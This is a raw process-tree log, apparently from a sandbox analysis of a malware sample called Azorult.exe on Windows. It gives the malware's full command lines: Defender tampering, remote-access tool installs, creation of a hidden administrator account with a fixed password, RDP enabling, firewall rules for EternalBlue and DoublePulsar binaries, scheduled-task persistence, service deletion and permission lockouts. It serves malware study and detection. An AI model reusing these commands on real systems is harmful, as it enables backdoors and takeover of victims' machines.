C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:1580 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:3112 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
PID:5728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵PID:4420
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Runs .reg file with regedit
PID:4424 -
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:4216 -
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:444 -
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
PID:3316 -
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
PID:5924 -
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
PID:4476 -
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:4884 -
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:4588 -
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:2288 -
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:1896 -
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:5420 -
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
PID:5840 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵PID:2364
-
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:5632 -
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Checks computer location settings
PID:1628 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Checks computer location settings
PID:3040 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵PID:648
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Checks computer location settings
- Modifies registry class
PID:1104 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
- Checks computer location settings
PID:472 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Checks computer location settings
PID:2376 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4588
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:2100 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:3472 -
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- Delays execution with timeout.exe
PID:2940 -
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:4472
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵PID:3356
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
PID:2816 -
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:1396 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
- Checks computer location settings
PID:5880 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:2888
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:4556
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵PID:5292
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
PID:3952 -
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵PID:2336
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:2816
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:8
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:3408
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵PID:5124
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:5900
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:1416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵PID:1576
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵PID:4976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:1048
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:1424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:2516
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵PID:4284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵PID:5328
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵PID:2988
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵PID:2220
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:4560
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:3004
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:1284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵PID:1572
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Sets DLL path for service in the registry
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5388 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
PID:6620 -
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵PID:6676
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵PID:6804
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:6824
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵PID:6840
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:6856 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:6872 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:6888 -
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:1264 -
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Checks computer location settings
PID:3144 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Checks computer location settings
PID:2888 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FFB3.tmp\FFB4.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:5544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4220
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
PID:5108 -
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
PID:5124 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵PID:1572
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:5940
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:2016
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:6740
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:6792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:6916
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:6968
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- Creates scheduled task(s)
PID:4132 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Creates scheduled task(s)
PID:2968 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
PID:644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:6520
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:6592 -
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:2016 -
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
PID:5280 -
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Kills process with taskkill
PID:6576 -
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:1820 -
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵PID:3960
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵PID:3904
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:5352 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:5356
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:4680
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:1312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:1716
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:5896 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵PID:1196
-
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:1936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵PID:4420
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:3304 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:2904
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
PID:2132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵PID:5284
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:4808 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:4024
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
PID:5312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:5260
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
PID:4856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:5152
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
PID:6116 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵PID:5648
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:4188 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:5728
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:1576 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵PID:3416
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:5572 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:6076
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
PID:3312 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:1396
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
PID:5644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:6100
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:1716 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:4720
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
PID:4588 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:3472
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
PID:5408 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵PID:3952
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
PID:3356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:5692
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:5220 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:2076
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
PID:1176 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:2984
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
PID:3960 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:2980
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
PID:5544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:5152
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
PID:2856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:5356
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
PID:372 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:2400
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3112 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:2124
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3128 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:4476
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵PID:4592
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:5856 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵PID:1936
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:2664 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵PID:3412
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:3484 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵PID:6052
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:5848 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵PID:1756
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:5544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵PID:2016
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:4700 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵PID:5124
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:1176 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵PID:4976
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:1724 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵PID:212
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes4⤵
- Modifies Windows Firewall
PID:5356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵PID:348
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN4⤵
- Modifies Windows Firewall
PID:1012 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵PID:648
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN4⤵
- Modifies Windows Firewall
PID:4592 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵PID:2180
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out4⤵
- Modifies Windows Firewall
PID:5676 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵PID:4808
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out4⤵
- Modifies Windows Firewall
PID:2132 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)3⤵PID:3992
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1936
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1524 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵PID:2760
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2984 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)3⤵PID:5692
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:5852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵PID:6048
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2400 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)3⤵PID:6052
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2728 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵PID:3468
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:660 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)3⤵PID:3316
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1416 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵PID:3416
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:1104 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)3⤵PID:472
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:4368 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵PID:4588
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2124 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)3⤵PID:3128
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
PID:2760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵PID:1716
-
